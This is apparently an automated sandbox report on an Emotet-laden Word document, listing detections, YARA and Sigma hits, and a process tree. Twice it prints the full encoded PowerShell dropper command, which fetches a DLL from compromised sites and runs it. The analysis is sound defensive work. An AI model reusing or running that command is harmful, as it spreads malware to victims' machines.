Play interactive tour

Edit tour

Analysis Report Informacion_29.doc

Overview

General Information

Sample Name:	Informacion_29.doc
Analysis ID:	336937
MD5:	6c1cb4c06ead6f5ce29a931fa12410fa
SHA1:	4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256:	43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Changes security center settings (notifications, updates, antivirus, firewall)

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many randomly named variables

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

WINWORD.EXE (PID: 6804 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

cmd.exe (PID: 7000 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

msg.exe (PID: 7044 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)

powershell.exe (PID: 7064 cmdline: POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA MD5: 95000560239032BC68B4C2FDFCDEF913)

rundll32.exe (PID: 204 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4456 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 5692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 784 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4648 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5552 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 4560 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 912 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 7072 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x2f9c:$s1: POwersheLL 0x595c:$s1: POwersheLL 0x9432:$s1: POwersheLL
0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x340:$s1: POwersheLL
00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1ac0:$s1: POwersheLL
00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x2ba:$s1: POwersheLL
00000004.00000002.289399769.0000018A15456000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x2024:$s1: POwersheLL 0x49e4:$s1: POwersheLL 0x8794:$s1: POwersheLL
0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.280124224.0000018A123D5000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x6c0:$s1: POwersheLL 0x4994:$s1: PowerShell 0x4994:$sr1: PowerShell 0x4994:$sn3: PowerShell
0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xcf8:$s1: POwersheLL 0x3908:$s1: PowerShell 0x3908:$sr1: PowerShell 0x3908:$sn3: PowerShell
00000004.00000002.290618766.0000018A2C1C0000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x11dc:$s1: POwersheLL
00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x6d8:$s1: POwersheLL 0x32e8:$s1: PowerShell 0x32e8:$sr1: PowerShell 0x32e8:$sn3: PowerShell
00000004.00000002.289463456.0000018A154C9000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xe46:$s1: POwersheLL 0x4194:$s1: POwersheLL 0x6b54:$s1: POwersheLL
0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.289073167.0000018A15205000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0xa00:$s1: POwersheLL 0x3610:$s1: PowerShell 0x3610:$sr1: PowerShell 0x3610:$sn3: PowerShell
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
14.2.rundll32.exe.3410000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.3410000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.29e0000.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.29e0000.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.41b0000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.3430000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwA